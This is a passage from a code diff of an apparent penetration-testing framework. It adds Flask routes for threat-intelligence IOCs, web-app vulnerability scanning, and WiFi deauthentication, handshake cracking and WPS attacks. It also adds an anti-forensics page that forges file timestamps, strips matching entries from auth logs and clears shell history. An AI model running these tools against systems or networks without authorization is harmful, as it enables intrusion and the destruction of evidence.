data = request.get_json(silent=True) or {}
|
||||
return jsonify(engine.remove_ioc(data.get('id', '')))
|
||||
else:
|
||||
return jsonify(engine.get_iocs(
|
||||
ioc_type=request.args.get('type'),
|
||||
source=request.args.get('source'),
|
||||
severity=request.args.get('severity'),
|
||||
search=request.args.get('search')
|
||||
))
|
||||
|
||||
@threat_intel_bp.route('/iocs/import', methods=['POST'])
|
||||
@login_required
|
||||
def import_iocs():
|
||||
data = request.get_json(silent=True) or {}
|
||||
return jsonify(_get_engine().bulk_import(
|
||||
data.get('text', ''), source=data.get('source', 'import'),
|
||||
ioc_type=data.get('ioc_type')
|
||||
))
|
||||
|
||||
@threat_intel_bp.route('/iocs/export')
|
||||
@login_required
|
||||
def export_iocs():
|
||||
fmt = request.args.get('format', 'json')
|
||||
ioc_type = request.args.get('type')
|
||||
content = _get_engine().export_iocs(fmt=fmt, ioc_type=ioc_type)
|
||||
ct = {'csv': 'text/csv', 'stix': 'application/json', 'json': 'application/json'}.get(fmt, 'text/plain')
|
||||
return Response(content, mimetype=ct, headers={'Content-Disposition': f'attachment; filename=iocs.{fmt}'})
|
||||
|
||||
@threat_intel_bp.route('/iocs/detect')
|
||||
@login_required
|
||||
def detect_type():
|
||||
value = request.args.get('value', '')
|
||||
return jsonify({'type': _get_engine().detect_ioc_type(value)})
|
||||
|
||||
@threat_intel_bp.route('/stats')
|
||||
@login_required
|
||||
def stats():
|
||||
return jsonify(_get_engine().get_stats())
|
||||
|
||||
@threat_intel_bp.route('/feeds', methods=['GET', 'POST', 'DELETE'])
|
||||
@login_required
|
||||
def feeds():
|
||||
engine = _get_engine()
|
||||
if request.method == 'POST':
|
||||
data = request.get_json(silent=True) or {}
|
||||
return jsonify(engine.add_feed(
|
||||
name=data.get('name', ''), feed_type=data.get('feed_type', ''),
|
||||
url=data.get('url', ''), api_key=data.get('api_key', ''),
|
||||
interval_hours=data.get('interval_hours', 24)
|
||||
))
|
||||
elif request.method == 'DELETE':
|
||||
data = request.get_json(silent=True) or {}
|
||||
return jsonify(engine.remove_feed(data.get('id', '')))
|
||||
return jsonify(engine.get_feeds())
|
||||
|
||||
@threat_intel_bp.route('/feeds/<feed_id>/fetch', methods=['POST'])
|
||||
@login_required
|
||||
def fetch_feed(feed_id):
|
||||
return jsonify(_get_engine().fetch_feed(feed_id))
|
||||
|
||||
@threat_intel_bp.route('/lookup/virustotal', methods=['POST'])
|
||||
@login_required
|
||||
def lookup_vt():
|
||||
data = request.get_json(silent=True) or {}
|
||||
return jsonify(_get_engine().lookup_virustotal(data.get('value', ''), data.get('api_key', '')))
|
||||
|
||||
@threat_intel_bp.route('/lookup/abuseipdb', methods=['POST'])
|
||||
@login_required
|
||||
def lookup_abuse():
|
||||
data = request.get_json(silent=True) or {}
|
||||
return jsonify(_get_engine().lookup_abuseipdb(data.get('ip', ''), data.get('api_key', '')))
|
||||
|
||||
@threat_intel_bp.route('/correlate/network', methods=['POST'])
|
||||
@login_required
|
||||
def correlate_network():
|
||||
data = request.get_json(silent=True) or {}
|
||||
return jsonify(_get_engine().correlate_network(data.get('connections', [])))
|
||||
|
||||
@threat_intel_bp.route('/blocklist')
|
||||
@login_required
|
||||
def blocklist():
|
||||
return Response(
|
||||
_get_engine().generate_blocklist(
|
||||
fmt=request.args.get('format', 'plain'),
|
||||
ioc_type=request.args.get('type', 'ip'),
|
||||
min_severity=request.args.get('min_severity', 'low')
|
||||
),
|
||||
mimetype='text/plain'
|
||||
)
|
||||
|
||||
@threat_intel_bp.route('/alerts')
|
||||
@login_required
|
||||
def alerts():
|
||||
return jsonify(_get_engine().get_alerts(int(request.args.get('limit', 100))))
|
||||
79
web/routes/webapp_scanner.py
Normal file
79
web/routes/webapp_scanner.py
Normal file
@ -0,0 +1,79 @@
|
||||
"""Web Application Scanner — web routes."""
|
||||
|
||||
from flask import Blueprint, render_template, request, jsonify
|
||||
from web.auth import login_required
|
||||
|
||||
webapp_scanner_bp = Blueprint('webapp_scanner', __name__)
|
||||
|
||||
|
||||
def _svc():
|
||||
from modules.webapp_scanner import get_webapp_scanner
|
||||
return get_webapp_scanner()
|
||||
|
||||
|
||||
@webapp_scanner_bp.route('/web-scanner/')
|
||||
@login_required
|
||||
def index():
|
||||
return render_template('webapp_scanner.html')
|
||||
|
||||
|
||||
@webapp_scanner_bp.route('/web-scanner/quick', methods=['POST'])
|
||||
@login_required
|
||||
def quick_scan():
|
||||
data = request.get_json(silent=True) or {}
|
||||
url = data.get('url', '').strip()
|
||||
if not url:
|
||||
return jsonify({'ok': False, 'error': 'URL required'})
|
||||
return jsonify({'ok': True, **_svc().quick_scan(url)})
|
||||
|
||||
|
||||
@webapp_scanner_bp.route('/web-scanner/dirbust', methods=['POST'])
|
||||
@login_required
|
||||
def dir_bruteforce():
|
||||
data = request.get_json(silent=True) or {}
|
||||
url = data.get('url', '').strip()
|
||||
if not url:
|
||||
return jsonify({'ok': False, 'error': 'URL required'})
|
||||
extensions = data.get('extensions', [])
|
||||
return jsonify(_svc().dir_bruteforce(url, extensions=extensions or None,
|
||||
threads=data.get('threads', 10)))
|
||||
|
||||
|
||||
@webapp_scanner_bp.route('/web-scanner/dirbust/<job_id>', methods=['GET'])
|
||||
@login_required
|
||||
def dirbust_status(job_id):
|
||||
return jsonify(_svc().get_job_status(job_id))
|
||||
|
||||
|
||||
@webapp_scanner_bp.route('/web-scanner/subdomain', methods=['POST'])
|
||||
@login_required
|
||||
def subdomain_enum():
|
||||
data = request.get_json(silent=True) or {}
|
||||
domain = data.get('domain', '').strip()
|
||||
if not domain:
|
||||
return jsonify({'ok': False, 'error': 'Domain required'})
|
||||
return jsonify(_svc().subdomain_enum(domain, use_ct=data.get('use_ct', True)))
|
||||
|
||||
|
||||
@webapp_scanner_bp.route('/web-scanner/vuln', methods=['POST'])
|
||||
@login_required
|
||||
def vuln_scan():
|
||||
data = request.get_json(silent=True) or {}
|
||||
url = data.get('url', '').strip()
|
||||
if not url:
|
||||
return jsonify({'ok': False, 'error': 'URL required'})
|
||||
return jsonify(_svc().vuln_scan(url,
|
||||
scan_sqli=data.get('sqli', True),
|
||||
scan_xss=data.get('xss', True)))
|
||||
|
||||
|
||||
@webapp_scanner_bp.route('/web-scanner/crawl', methods=['POST'])
|
||||
@login_required
|
||||
def crawl():
|
||||
data = request.get_json(silent=True) or {}
|
||||
url = data.get('url', '').strip()
|
||||
if not url:
|
||||
return jsonify({'ok': False, 'error': 'URL required'})
|
||||
return jsonify(_svc().crawl(url,
|
||||
max_pages=data.get('max_pages', 50),
|
||||
depth=data.get('depth', 3)))
|
||||
137
web/routes/wifi_audit.py
Normal file
137
web/routes/wifi_audit.py
Normal file
@ -0,0 +1,137 @@
|
||||
"""WiFi Auditing routes."""
|
||||
from flask import Blueprint, request, jsonify, render_template
|
||||
from web.routes.auth_routes import login_required
|
||||
|
||||
wifi_audit_bp = Blueprint('wifi_audit', __name__, url_prefix='/wifi')
|
||||
|
||||
def _get_auditor():
|
||||
from modules.wifi_audit import get_wifi_auditor
|
||||
return get_wifi_auditor()
|
||||
|
||||
@wifi_audit_bp.route('/')
|
||||
@login_required
|
||||
def index():
|
||||
return render_template('wifi_audit.html')
|
||||
|
||||
@wifi_audit_bp.route('/tools')
|
||||
@login_required
|
||||
def tools_status():
|
||||
return jsonify(_get_auditor().get_tools_status())
|
||||
|
||||
@wifi_audit_bp.route('/interfaces')
|
||||
@login_required
|
||||
def interfaces():
|
||||
return jsonify(_get_auditor().get_interfaces())
|
||||
|
||||
@wifi_audit_bp.route('/monitor/enable', methods=['POST'])
|
||||
@login_required
|
||||
def monitor_enable():
|
||||
data = request.get_json(silent=True) or {}
|
||||
return jsonify(_get_auditor().enable_monitor(data.get('interface', '')))
|
||||
|
||||
@wifi_audit_bp.route('/monitor/disable', methods=['POST'])
|
||||
@login_required
|
||||
def monitor_disable():
|
||||
data = request.get_json(silent=True) or {}
|
||||
return jsonify(_get_auditor().disable_monitor(data.get('interface')))
|
||||
|
||||
@wifi_audit_bp.route('/scan', methods=['POST'])
|
||||
@login_required
|
||||
def scan():
|
||||
data = request.get_json(silent=True) or {}
|
||||
return jsonify(_get_auditor().scan_networks(
|
||||
interface=data.get('interface'),
|
||||
duration=data.get('duration', 15)
|
||||
))
|
||||
|
||||
@wifi_audit_bp.route('/scan/results')
|
||||
@login_required
|
||||
def scan_results():
|
||||
return jsonify(_get_auditor().get_scan_results())
|
||||
|
||||
@wifi_audit_bp.route('/deauth', methods=['POST'])
|
||||
@login_required
|
||||
def deauth():
|
||||
data = request.get_json(silent=True) or {}
|
||||
return jsonify(_get_auditor().deauth(
|
||||
interface=data.get('interface'),
|
||||
bssid=data.get('bssid', ''),
|
||||
client=data.get('client'),
|
||||
count=data.get('count', 10)
|
||||
))
|
||||
|
||||
@wifi_audit_bp.route('/handshake', methods=['POST'])
|
||||
@login_required
|
||||
def capture_handshake():
|
||||
data = request.get_json(silent=True) or {}
|
||||
a = _get_auditor()
|
||||
job_id = a.capture_handshake(
|
||||
interface=data.get('interface', a.monitor_interface or ''),
|
||||
bssid=data.get('bssid', ''),
|
||||
channel=data.get('channel', 1),
|
||||
deauth_count=data.get('deauth_count', 5),
|
||||
timeout=data.get('timeout', 60)
|
||||
)
|
||||
return jsonify({'ok': True, 'job_id': job_id})
|
||||
|
||||
@wifi_audit_bp.route('/crack', methods=['POST'])
|
||||
@login_required
|
||||
def crack():
|
||||
data = request.get_json(silent=True) or {}
|
||||
job_id = _get_auditor().crack_handshake(
|
||||
data.get('capture_file', ''), data.get('wordlist', ''), data.get('bssid')
|
||||
)
|
||||
return jsonify({'ok': bool(job_id), 'job_id': job_id})
|
||||
|
||||
@wifi_audit_bp.route('/wps/scan', methods=['POST'])
|
||||
@login_required
|
||||
def wps_scan():
|
||||
data = request.get_json(silent=True) or {}
|
||||
return jsonify(_get_auditor().wps_scan(data.get('interface')))
|
||||
|
||||
@wifi_audit_bp.route('/wps/attack', methods=['POST'])
|
||||
@login_required
|
||||
def wps_attack():
|
||||
data = request.get_json(silent=True) or {}
|
||||
a = _get_auditor()
|
||||
job_id = a.wps_attack(
|
||||
interface=data.get('interface', a.monitor_interface or ''),
|
||||
bssid=data.get('bssid', ''),
|
||||
channel=data.get('channel', 1),
|
||||
pixie_dust=data.get('pixie_dust', True)
|
||||
)
|
||||
return jsonify({'ok': bool(job_id), 'job_id': job_id})
|
||||
|
||||
@wifi_audit_bp.route('/rogue/save', methods=['POST'])
|
||||
@login_required
|
||||
def rogue_save():
|
||||
return jsonify(_get_auditor().save_known_aps())
|
||||
|
||||
@wifi_audit_bp.route('/rogue/detect')
|
||||
@login_required
|
||||
def rogue_detect():
|
||||
return jsonify(_get_auditor().detect_rogue_aps())
|
||||
|
||||
@wifi_audit_bp.route('/capture/start', methods=['POST'])
|
||||
@login_required
|
||||
def capture_start():
|
||||
data = request.get_json(silent=True) or {}
|
||||
return jsonify(_get_auditor().start_capture(
|
||||
data.get('interface'), data.get('channel'), data.get('bssid'), data.get('name')
|
||||
))
|
||||
|
||||
@wifi_audit_bp.route('/capture/stop', methods=['POST'])
|
||||
@login_required
|
||||
def capture_stop():
|
||||
return jsonify(_get_auditor().stop_capture())
|
||||
|
||||
@wifi_audit_bp.route('/captures')
|
||||
@login_required
|
||||
def captures_list():
|
||||
return jsonify(_get_auditor().list_captures())
|
||||
|
||||
@wifi_audit_bp.route('/job/<job_id>')
|
||||
@login_required
|
||||
def job_status(job_id):
|
||||
job = _get_auditor().get_job(job_id)
|
||||
return jsonify(job or {'error': 'Job not found'})
|
||||
408
web/templates/anti_forensics.html
Normal file
408
web/templates/anti_forensics.html
Normal file
@ -0,0 +1,408 @@
|
||||
{% extends "base.html" %}
|
||||
{% block title %}AUTARCH — Anti-Forensics{% endblock %}
|
||||
|
||||
{% block content %}
|
||||
<div class="page-header">
|
||||
<h1>Anti-Forensics</h1>
|
||||
<p style="margin:0;font-size:0.85rem;color:var(--text-secondary)">
|
||||
Secure deletion, timestamp manipulation, and log sanitization.
|
||||
</p>
|
||||
</div>
|
||||
|
||||
<!-- Tab Bar -->
|
||||
<div class="tab-bar">
|
||||
<button class="tab active" data-tab-group="af" data-tab="delete" onclick="showTab('af','delete')">Secure Delete</button>
|
||||
<button class="tab" data-tab-group="af" data-tab="timestamps" onclick="showTab('af','timestamps')">Timestamps</button>
|
||||
<button class="tab" data-tab-group="af" data-tab="logs" onclick="showTab('af','logs')">Logs</button>
|
||||
</div>
|
||||
|
||||
<!-- ==================== SECURE DELETE TAB ==================== -->
|
||||
<div class="tab-content active" data-tab-group="af" data-tab="delete">
|
||||
|
||||
<div class="section">
|
||||
<h2>Secure Delete File</h2>
|
||||
<p style="font-size:0.8rem;color:var(--text-muted);margin-bottom:8px">
|
||||
Overwrite and delete a file so it cannot be recovered by forensic tools.
|
||||
</p>
|
||||
<div class="form-row" style="margin-bottom:8px">
|
||||
<div class="form-group" style="flex:2">
|
||||
<label>File Path</label>
|
||||
<input type="text" id="af-del-file" placeholder="/path/to/file">
|
||||
</div>
|
||||
<div class="form-group">
|
||||
<label>Overwrite Passes</label>
|
||||
<input type="number" id="af-del-passes" value="3" min="1" max="35">
|
||||
</div>
|
||||
<div class="form-group">
|
||||
<label>Method</label>
|
||||
<select id="af-del-method">
|
||||
<option value="zeros">Zero fill</option>
|
||||
<option value="random" selected>Random data</option>
|
||||
<option value="dod">DoD 5220.22-M (3-pass)</option>
|
||||
<option value="gutmann">Gutmann (35-pass)</option>
|
||||
</select>
|
||||
</div>
|
||||
</div>
|
||||
<div class="tool-actions" style="margin-bottom:12px">
|
||||
<button id="btn-af-del-file" class="btn btn-danger" onclick="afDeleteFile()">Secure Delete File</button>
|
||||
</div>
|
||||
<pre class="output-panel" id="af-del-file-output" style="min-height:0"></pre>
|
||||
</div>
|
||||
|
||||
<div class="section">
|
||||
<h2>Secure Delete Directory</h2>
|
||||
<p style="font-size:0.8rem;color:var(--text-muted);margin-bottom:8px">
|
||||
Recursively overwrite and delete all files in a directory.
|
||||
</p>
|
||||
<div class="form-row" style="margin-bottom:8px">
|
||||
<div class="form-group" style="flex:2">
|
||||
<label>Directory Path</label>
|
||||
<input type="text" id="af-del-dir" placeholder="/path/to/directory">
|
||||
</div>
|
||||
</div>
|
||||
<div style="margin-bottom:12px">
|
||||
<label style="font-size:0.85rem;color:var(--text-primary);cursor:pointer">
|
||||
<input type="checkbox" id="af-del-dir-confirm" style="margin-right:4px"> I confirm this directory should be permanently destroyed
|
||||
</label>
|
||||
</div>
|
||||
<div class="tool-actions" style="margin-bottom:12px">
|
||||
<button id="btn-af-del-dir" class="btn btn-danger" onclick="afDeleteDir()">Secure Delete Directory</button>
|
||||
</div>
|
||||
<pre class="output-panel" id="af-del-dir-output" style="min-height:0"></pre>
|
||||
</div>
|
||||
|
||||
<div class="section">
|
||||
<h2>Wipe Free Space</h2>
|
||||
<p style="font-size:0.8rem;color:var(--text-muted);margin-bottom:8px">
|
||||
Overwrite all free space on a mount point to prevent recovery of previously deleted files.
|
||||
</p>
|
||||
<div class="input-row">
|
||||
<input type="text" id="af-wipe-mount" placeholder="Mount point (e.g. / or /home)">
|
||||
<button id="btn-af-wipe" class="btn btn-warning" onclick="afWipeFreeSpace()">Wipe Free Space</button>
|
||||
</div>
|
||||
<pre class="output-panel" id="af-wipe-output" style="min-height:0"></pre>
|
||||
</div>
|
||||
|
||||
</div>
|
||||
|
||||
<!-- ==================== TIMESTAMPS TAB ==================== -->
|
||||
<div class="tab-content" data-tab-group="af" data-tab="timestamps">
|
||||
|
||||
<div class="section">
|
||||
<h2>View Timestamps</h2>
|
||||
<div class="input-row">
|
||||
<input type="text" id="af-ts-view-path" placeholder="File path">
|
||||
<button id="btn-af-ts-view" class="btn btn-primary" onclick="afViewTimestamps()">View</button>
|
||||
</div>
|
||||
<table class="data-table" style="max-width:500px;margin-top:8px" id="af-ts-view-table">
|
||||
<tbody>
|
||||
<tr><td>Accessed</td><td id="af-ts-accessed">--</td></tr>
|
||||
<tr><td>Modified</td><td id="af-ts-modified">--</td></tr>
|
||||
<tr><td>Created</td><td id="af-ts-created">--</td></tr>
|
||||
</tbody>
|
||||
</table>
|
||||
</div>
|
||||
|
||||
<div class="section">
|
||||
<h2>Set Timestamps</h2>
|
||||
<p style="font-size:0.8rem;color:var(--text-muted);margin-bottom:8px">
|
||||
Set a specific date/time for a file's access and modification timestamps.
|
||||
</p>
|
||||
<div class="form-row" style="margin-bottom:8px">
|
||||
<div class="form-group" style="flex:2">
|
||||
<label>File Path</label>
|
||||
<input type="text" id="af-ts-set-path" placeholder="/path/to/file">
|
||||
</div>
|
||||
<div class="form-group">
|
||||
<label>Date & Time</label>
|
||||
<input type="datetime-local" id="af-ts-set-date" style="background:var(--bg-input);border:1px solid var(--border);border-radius:var(--radius);color:var(--text-primary);padding:8px 12px">
|
||||
</div>
|
||||
</div>
|
||||
<div class="tool-actions" style="margin-bottom:12px">
|
||||
<button id="btn-af-ts-set" class="btn btn-primary" onclick="afSetTimestamps()">Set Timestamps</button>
|
||||
</div>
|
||||
<pre class="output-panel" id="af-ts-set-output" style="min-height:0"></pre>
|
||||
</div>
|
||||
|
||||
<div class="section">
|
||||
<h2>Clone Timestamps</h2>
|
||||
<p style="font-size:0.8rem;color:var(--text-muted);margin-bottom:8px">
|
||||
Copy timestamps from a source file to a target file.
|
||||
</p>
|
||||
<div class="form-row" style="margin-bottom:8px">
|
||||
<div class="form-group">
|
||||
<label>Source File</label>
|
||||
<input type="text" id="af-ts-clone-src" placeholder="Source file (timestamps to copy)">
|
||||
</div>
|
||||
<div class="form-group">
|
||||
<label>Target File</label>
|
||||
<input type="text" id="af-ts-clone-dst" placeholder="Target file (timestamps to set)">
|
||||
</div>
|
||||
</div>
|
||||
<div class="tool-actions" style="margin-bottom:12px">
|
||||
<button id="btn-af-ts-clone" class="btn btn-primary" onclick="afCloneTimestamps()">Clone Timestamps</button>
|
||||
</div>
|
||||
<pre class="output-panel" id="af-ts-clone-output" style="min-height:0"></pre>
|
||||
</div>
|
||||
|
||||
<div class="section">
|
||||
<h2>Randomize Timestamps</h2>
|
||||
<p style="font-size:0.8rem;color:var(--text-muted);margin-bottom:8px">
|
||||
Set random plausible timestamps on a file to confuse forensic timeline analysis.
|
||||
</p>
|
||||
<div class="input-row">
|
||||
<input type="text" id="af-ts-rand-path" placeholder="File path">
|
||||
<button id="btn-af-ts-rand" class="btn btn-warning" onclick="afRandomizeTimestamps()">Randomize</button>
|
||||
</div>
|
||||
<pre class="output-panel" id="af-ts-rand-output" style="min-height:0"></pre>
|
||||
</div>
|
||||
|
||||
</div>
|
||||
|
||||
<!-- ==================== LOGS TAB ==================== -->
|
||||
<div class="tab-content" data-tab-group="af" data-tab="logs">
|
||||
|
||||
<div class="section">
|
||||
<h2>System Logs</h2>
|
||||
<div class="tool-actions" style="margin-bottom:12px">
|
||||
<button class="btn btn-small" onclick="afLoadLogs()">Refresh</button>
|
||||
</div>
|
||||
<table class="data-table">
|
||||
<thead><tr><th>Log File</th><th>Size</th><th>Writable</th><th>Action</th></tr></thead>
|
||||
<tbody id="af-logs-table">
|
||||
<tr><td colspan="4" class="empty-state">Click Refresh to scan system log files.</td></tr>
|
||||
</tbody>
|
||||
</table>
|
||||
</div>
|
||||
|
||||
<div class="section">
|
||||
<h2>Remove Matching Entries</h2>
|
||||
<p style="font-size:0.8rem;color:var(--text-muted);margin-bottom:8px">
|
||||
Remove lines matching a regex pattern from a log file.
|
||||
</p>
|
||||
<div class="form-row" style="margin-bottom:8px">
|
||||
<div class="form-group" style="flex:2">
|
||||
<label>Log File Path</label>
|
||||
<input type="text" id="af-log-rm-path" placeholder="/var/log/auth.log">
|
||||
</div>
|
||||
<div class="form-group" style="flex:2">
|
||||
<label>Pattern (regex)</label>
|
||||
<input type="text" id="af-log-rm-pattern" placeholder="e.g. 192\\.168\\.1\\.100|Failed password">
|
||||
</div>
|
||||
</div>
|
||||
<div class="tool-actions" style="margin-bottom:12px">
|
||||
<button id="btn-af-log-rm" class="btn btn-danger" onclick="afRemoveEntries()">Remove Entries</button>
|
||||
</div>
|
||||
<pre class="output-panel" id="af-log-rm-output" style="min-height:0"></pre>
|
||||
</div>
|
||||
|
||||
<div class="section">
|
||||
<h2>Quick Actions</h2>
|
||||
<div class="tool-grid">
|
||||
<div class="tool-card">
|
||||
<h4>Clear Shell History</h4>
|
||||
<p>Erase bash, zsh, and fish shell history for the current user.</p>
|
||||
<button class="btn btn-danger btn-small" onclick="afClearHistory()">Clear History</button>
|
||||
<pre class="output-panel tool-result" id="af-clear-history-output"></pre>
|
||||
</div>
|
||||
<div class="tool-card">
|
||||
<h4>Scrub Image Metadata</h4>
|
||||
<p>Remove EXIF, GPS, and other metadata from image files (JPEG, PNG, TIFF).</p>
|
||||
<div class="input-row" style="margin-top:8px">
|
||||
<input type="text" id="af-scrub-img-path" placeholder="Image file path" style="font-size:0.8rem">
|
||||
</div>
|
||||
<button class="btn btn-warning btn-small" onclick="afScrubImage()">Scrub Metadata</button>
|
||||
<pre class="output-panel tool-result" id="af-scrub-img-output"></pre>
|
||||
</div>
|
||||
<div class="tool-card">
|
||||
<h4>Scrub PDF Metadata</h4>
|
||||
<p>Remove author, creation date, and other metadata from PDF files.</p>
|
||||
<div class="input-row" style="margin-top:8px">
|
||||
<input type="text" id="af-scrub-pdf-path" placeholder="PDF file path" style="font-size:0.8rem">
|
||||
</div>
|
||||
<button class="btn btn-warning btn-small" onclick="afScrubPDF()">Scrub Metadata</button>
|
||||
<pre class="output-panel tool-result" id="af-scrub-pdf-output"></pre>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
</div>
|
||||
|
||||
<script>
|
||||
function esc(s) { return String(s).replace(/&/g,'&').replace(/</g,'<'); }
|
||||
|
||||
/* ── Secure Delete ── */
|
||||
function afDeleteFile() {
|
||||
var path = document.getElementById('af-del-file').value.trim();
|
||||
if (!path) return;
|
||||
if (!confirm('Permanently destroy "' + path + '"? This cannot be undone.')) return;
|
||||
var btn = document.getElementById('btn-af-del-file');
|
||||
setLoading(btn, true);
|
||||
postJSON('/anti-forensics/delete/file', {
|
||||
path: path,
|
||||
passes: parseInt(document.getElementById('af-del-passes').value) || 3,
|
||||
method: document.getElementById('af-del-method').value
|
||||
}).then(function(data) {
|
||||
setLoading(btn, false);
|
||||
renderOutput('af-del-file-output', data.message || data.error || 'Done');
|
||||
}).catch(function() { setLoading(btn, false); });
|
||||
}
|
||||
|
||||
function afDeleteDir() {
|
||||
var path = document.getElementById('af-del-dir').value.trim();
|
||||
if (!path) return;
|
||||
if (!document.getElementById('af-del-dir-confirm').checked) {
|
||||
renderOutput('af-del-dir-output', 'You must check the confirmation box before proceeding.');
|
||||
return;
|
||||
}
|
||||
if (!confirm('DANGER: Permanently destroy all files in "' + path + '"? This cannot be undone.')) return;
|
||||
var btn = document.getElementById('btn-af-del-dir');
|
||||
setLoading(btn, true);
|
||||
postJSON('/anti-forensics/delete/directory', {path: path}).then(function(data) {
|
||||
setLoading(btn, false);
|
||||
renderOutput('af-del-dir-output', data.message || data.error || 'Done');
|
||||
}).catch(function() { setLoading(btn, false); });
|
||||
}
|
||||
|
||||
function afWipeFreeSpace() {
|
||||
var mount = document.getElementById('af-wipe-mount').value.trim();
|
||||
if (!mount) return;
|
||||
if (!confirm('Wipe all free space on "' + mount + '"? This may take a long time.')) return;
|
||||
var btn = document.getElementById('btn-af-wipe');
|
||||
setLoading(btn, true);
|
||||
postJSON('/anti-forensics/wipe-free-space', {mount_point: mount}).then(function(data) {
|
||||
setLoading(btn, false);
|
||||
renderOutput('af-wipe-output', data.message || data.error || 'Done');
|
||||
}).catch(function() { setLoading(btn, false); });
|
||||
}
|
||||
|
||||
/* ── Timestamps ── */
|
||||
function afViewTimestamps() {
|
||||
var path = document.getElementById('af-ts-view-path').value.trim();
|
||||
if (!path) return;
|
||||
var btn = document.getElementById('btn-af-ts-view');
|
||||
setLoading(btn, true);
|
||||
postJSON('/anti-forensics/timestamps/view', {path: path}).then(function(data) {
|
||||
setLoading(btn, false);
|
||||
if (data.error) {
|
||||
document.getElementById('af-ts-accessed').textContent = 'Error';
|
||||
document.getElementById('af-ts-modified').textContent = data.error;
|
||||
document.getElementById('af-ts-created').textContent = '--';
|
||||
return;
|
||||
}
|
||||
document.getElementById('af-ts-accessed').textContent = data.accessed || '--';
|
||||
document.getElementById('af-ts-modified').textContent = data.modified || '--';
|
||||
document.getElementById('af-ts-created').textContent = data.created || '--';
|
||||
}).catch(function() { setLoading(btn, false); });
|
||||
}
|
||||
|
||||
function afSetTimestamps() {
|
||||
var path = document.getElementById('af-ts-set-path').value.trim();
|
||||
var date = document.getElementById('af-ts-set-date').value;
|
||||
if (!path || !date) { renderOutput('af-ts-set-output', 'File path and date are required.'); return; }
|
||||
var btn = document.getElementById('btn-af-ts-set');
|
||||
setLoading(btn, true);
|
||||
postJSON('/anti-forensics/timestamps/set', {path: path, datetime: date}).then(function(data) {
|
||||
setLoading(btn, false);
|
||||
renderOutput('af-ts-set-output', data.message || data.error || 'Done');
|
||||
}).catch(function() { setLoading(btn, false); });
|
||||
}
|
||||
|
||||
function afCloneTimestamps() {
|
||||
var src = document.getElementById('af-ts-clone-src').value.trim();
|
||||
var dst = document.getElementById('af-ts-clone-dst').value.trim();
|
||||
if (!src || !dst) { renderOutput('af-ts-clone-output', 'Both source and target paths are required.'); return; }
|
||||
var btn = document.getElementById('btn-af-ts-clone');
|
||||
setLoading(btn, true);
|
||||
postJSON('/anti-forensics/timestamps/clone', {source: src, target: dst}).then(function(data) {
|
||||
setLoading(btn, false);
|
||||
renderOutput('af-ts-clone-output', data.message || data.error || 'Done');
|
||||
}).catch(function() { setLoading(btn, false); });
|
||||
}
|
||||
|
||||
function afRandomizeTimestamps() {
|
||||
var path = document.getElementById('af-ts-rand-path').value.trim();
|
||||
if (!path) return;
|
||||
var btn = document.getElementById('btn-af-ts-rand');
|
||||
setLoading(btn, true);
|
||||
postJSON('/anti-forensics/timestamps/randomize', {path: path}).then(function(data) {
|
||||
setLoading(btn, false);
|
||||
renderOutput('af-ts-rand-output', data.message || data.error || 'Done');
|
||||
}).catch(function() { setLoading(btn, false); });
|
||||
}
|
||||
|
||||
/* ── Logs ── */
|
||||
function afLoadLogs() {
|
||||
fetchJSON('/anti-forensics/logs/list').then(function(data) {
|
||||
var tb = document.getElementById('af-logs-table');
|
||||
var logs = data.logs || [];
|
||||
if (!logs.length) {
|
||||
tb.innerHTML = '<tr><td colspan="4" class="empty-state">No log files found or insufficient permissions.</td></tr>';
|
||||
return;
|
||||
}
|
||||
var html = '';
|
||||
logs.forEach(function(l) {
|
||||
var writeBadge = l.writable ? '<span class="badge badge-pass">Yes</span>' : '<span class="badge badge-fail">No</span>';
|
||||
var clearBtn = l.writable ? '<button class="btn btn-danger btn-small" onclick="afClearLog(\'' + esc(l.path) + '\')">Clear</button>' : '<span style="color:var(--text-muted);font-size:0.8rem">Read-only</span>';
|
||||
html += '<tr><td style="font-family:monospace;font-size:0.85rem">' + esc(l.path) + '</td>'
|
||||
+ '<td>' + esc(l.size) + '</td>'
|
||||
+ '<td>' + writeBadge + '</td>'
|
||||
+ '<td>' + clearBtn + '</td></tr>';
|
||||
});
|
||||
tb.innerHTML = html;
|
||||
});
|
||||
}
|
||||
|
||||
function afClearLog(path) {
|
||||
if (!confirm('Clear log file "' + path + '"?')) return;
|
||||
postJSON('/anti-forensics/logs/clear', {path: path}).then(function(data) {
|
||||
if (data.success) afLoadLogs();
|
||||
else alert(data.error || 'Failed to clear log');
|
||||
});
|
||||
}
|
||||
|
||||
function afRemoveEntries() {
|
||||
var path = document.getElementById('af-log-rm-path').value.trim();
|
||||
var pattern = document.getElementById('af-log-rm-pattern').value.trim();
|
||||
if (!path || !pattern) { renderOutput('af-log-rm-output', 'Path and pattern are required.'); return; }
|
||||
var btn = document.getElementById('btn-af-log-rm');
|
||||
setLoading(btn, true);
|
||||
postJSON('/anti-forensics/logs/remove-entries', {path: path, pattern: pattern}).then(function(data) {
|
||||
setLoading(btn, false);
|
||||
renderOutput('af-log-rm-output', data.message || data.error || 'Done');
|
||||
}).catch(function() { setLoading(btn, false); });
|
||||
}
|
||||
|
||||
function afClearHistory() {
|
||||
if (!confirm('Clear all shell history? This cannot be undone.')) return;
|
||||
var el = document.getElementById('af-clear-history-output');
|
||||
el.style.display = 'block';
|
||||
el.textContent = 'Clearing...';
|
||||
postJSON('/anti-forensics/clear-history', {}).then(function(data) {
|
||||
el.textContent = data.message || data.error || 'Done';
|
||||
}).catch(function() { el.textContent = 'Request failed'; });
|
||||
}
|
||||
|
||||
function afScrubImage() {
|
||||
var path = document.getElementById('af-scrub-img-path').value.trim();
|
||||
if (!path) return;
|
||||
var el = document.getElementById('af-scrub-img-output');
|
||||
el.style.display = 'block';
|
||||
el.textContent = 'Scrubbing...';
|
||||
postJSON('/anti-forensics/scrub/image', {path: path}).then(function(data) {
|
||||
el.textContent = data.message || data.error || 'Done';
|
||||
}).catch(function() { el.textContent = 'Request failed'; });
|
||||
}
|
||||
|
||||
function afScrubPDF() {
|
||||
var path = document.getElementById('af-scrub-pdf-path').value.trim();
|
||||
if (!path) return;
|
||||
var el = document.getElementById('af-scrub-pdf-output');
|
||||
el.style.display = 'block';
|
||||
el.textContent = 'Scrubbing...';
|
||||
postJSON('/anti-forensics/scrub/pdf', {path: path}).then(function(data) {
|
||||
el.textContent = data.message || data.error || 'Done';
|
||||
}).catch(function() { el.textContent = 'Request failed'; });
|
||||
}
|
||||
</script>
|
||||
{% endblock %}
|
||||
595
web/templates/api_fuzzer.html
Normal file
595
web/templates/api_fuzzer.html
